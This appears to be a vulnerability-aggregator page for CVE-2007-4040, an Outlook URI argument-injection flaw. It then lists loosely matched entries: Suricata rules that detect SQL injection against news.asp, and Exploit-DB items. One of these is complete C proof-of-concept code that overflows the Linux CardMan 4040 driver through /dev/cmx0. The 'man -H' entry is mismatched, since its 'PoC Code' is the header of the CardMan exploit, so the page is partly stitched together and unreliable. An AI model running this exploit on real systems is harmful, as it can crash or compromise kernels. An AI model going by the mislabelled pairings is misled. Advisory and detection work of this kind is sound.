CVE-2007-4040
Published: 2007-07-27
Priority: P339 high · CVSS 3.1: 8.8
AV:N · AC:L · PR:N · UI:R · S:U · C:H · I:H · A:H
EPSS: 13.47% (96.0th percentile)
Argument injection vulnerability involving Microsoft Outlook and Outlook Express, when certain URIs are registered, allows remote attackers to conduct cross-browser scripting attacks and execute arbitrary commands via shell metacharacters in an unspecified URI, which are inserted into the command line when invoking the handling process, a similar issue to CVE-2007-3670.
CVSS provenance
nvd · v3.1 · 8.8 HIGH · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvd · v2.0 · 4.3 MEDIUM · AV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_redhat · 6.9 MEDIUM
GHSA
GHSA-2mgm-7frw-wmjm: Argument injection vulnerability involving Microsoft Outlook and Outlook Express, when certain URIs are registered, allows remote attackers to conduct
ghsa_unreviewed·2022-05-01·CVSS 4.3
CVE-2007-4040 [MEDIUM] CWE-79 GHSA-2mgm-7frw-wmjm: Argument injection vulnerability involving Microsoft Outlook and Outlook Express, when certain URIs are registered, allows remote attackers to conduct
Red Hat
security flaw
vendor_redhat·2007-03-06·CVSS 6.9
CVE-2007-0005 [MEDIUM] security flaw
Multiple buffer overflows in the (1) read and (2) write handlers in the Omnikey CardMan 4040 driver in the Linux kernel before 2.6.21-rc3 allow local users to gain privileges.
Suricata
ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2007-3119 [HIGH] ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id INSERT"; flow:established,to_server; http.uri; content:"/news.asp?"; nocase; content:"news_id="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2007-3119; reference:url,www.exploit-db.com/exploits/4040/; classtype:web-application-attack; sid:2004643; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Ini
Suricata
ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2007-3119 [HIGH] ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id UPDATE"; flow:established,to_server; http.uri; content:"/news.asp?"; nocase; content:"news_id="; nocase; content:"UPDATE"; nocase; content:"SET"; nocase; distance:0; reference:cve,CVE-2007-3119; reference:url,www.exploit-db.com/exploits/4040/; classtype:web-application-attack; sid:2004646; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Init
Suricata
ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id UNION SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-3119 [HIGH] ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id UNION SELECT"; flow:established,to_server; http.uri; content:"/news.asp?"; nocase; content:"news_id="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-3119; reference:url,www.exploit-db.com/exploits/4040/; classtype:web-application-attack; sid:2004642; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_ta
Suricata
ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-3119 [HIGH] ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id SELECT"; flow:established,to_server; http.uri; content:"/news.asp?"; nocase; content:"news_id="; nocase; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-3119; reference:url,www.exploit-db.com/exploits/4040/; classtype:web-application-attack; sid:2004641; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Ini
Suricata
ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2007-3119 [HIGH] ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id ASCII"; flow:established,to_server; http.uri; content:"/news.asp?"; nocase; content:"news_id="; nocase; content:"ASCII("; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-3119; reference:url,www.exploit-db.com/exploits/4040/; classtype:web-application-attack; sid:2004645; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Ini
Suricata
ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2007-3119 [HIGH] ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Kartli Alisveris Sistemi SQL Injection Attempt -- news.asp news_id DELETE"; flow:established,to_server; http.uri; content:"/news.asp?"; nocase; content:"news_id="; nocase; content:"DELETE"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-3119; reference:url,www.exploit-db.com/exploits/4040/; classtype:web-application-attack; sid:2004644; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Ini
Exploit-DB
Man Command - -H Flag Local Buffer Overflow
exploitdb·2007-04-06·CVSS 6.9
CVE-2006-4250 [MEDIUM] Man Command - -H Flag Local Buffer Overflow
---
// source: https://www.securityfocus.com/bid/23355/info
The 'man' command is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before using it in a memory copy operation.
NOTE: Presumably, this issue is exploitable only when 'man' has been installed setuid.
Exploiting this issue allows attackers to execute malicious machine code with the privileges of the 'man' utility. This can result in the compromise of affected computers. Failed exploit attempts will likely result in denial-of-service conditions.
PoC Code:
/*
* Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)
* Copyright (C) Daniel Roethlisberger
* Compass Security Network Computing AG, Rapperswil, Switzerla
Exploit-DB
Linux Omnikey Cardman 4040 Driver - Local Buffer Overflow (PoC)
exploitdb·2007-03-09·CVSS 6.9
CVE-2007-0005 [MEDIUM] Linux Omnikey Cardman 4040 Driver - Local Buffer Overflow (PoC)
---
/*
* Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)
* Copyright (C) Daniel Roethlisberger
* Compass Security Network Computing AG, Rapperswil, Switzerland.
* All rights reserved.
* http://www.csnc.ch/
*/
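#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
int main(int argc, char *argv[]) {
    int fd, i, n;
    char buf[8192];
    /*
     * 0 1 2 3 4 5 6 7 8 9 a b c d e f ...
     * 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00 08 ...
     */
    /* Fill the buffer with a 16-bit big-endian counter so offsets are recognisable. */
    for (i = 0; i < (int) sizeof(buf); i += 2) {
        buf[i] = (char) ((i/2) >> 8);
        buf[i+1] = (char) ((i/2) & 0x00FF);
    }
    /* Open the CardMan 4040 character device. */
    if ((fd = open("/dev/cmx0", O_RDWR)) < 0) {
        fprintf(stderr, "open: %s\n", strerror(errno));
        exit(errno);
    }
    /* Single write larger than the driver's buffer, handled by the write handler. */
    if ((n = write(fd, buf, sizeof(buf))) < 0) {
        fprintf(stderr, "write: %s\n", strerror(errno));
        exit(errno);
    }
    printf("%d of %zu bytes written\n", n, sizeof(buf));
    exit(0);
}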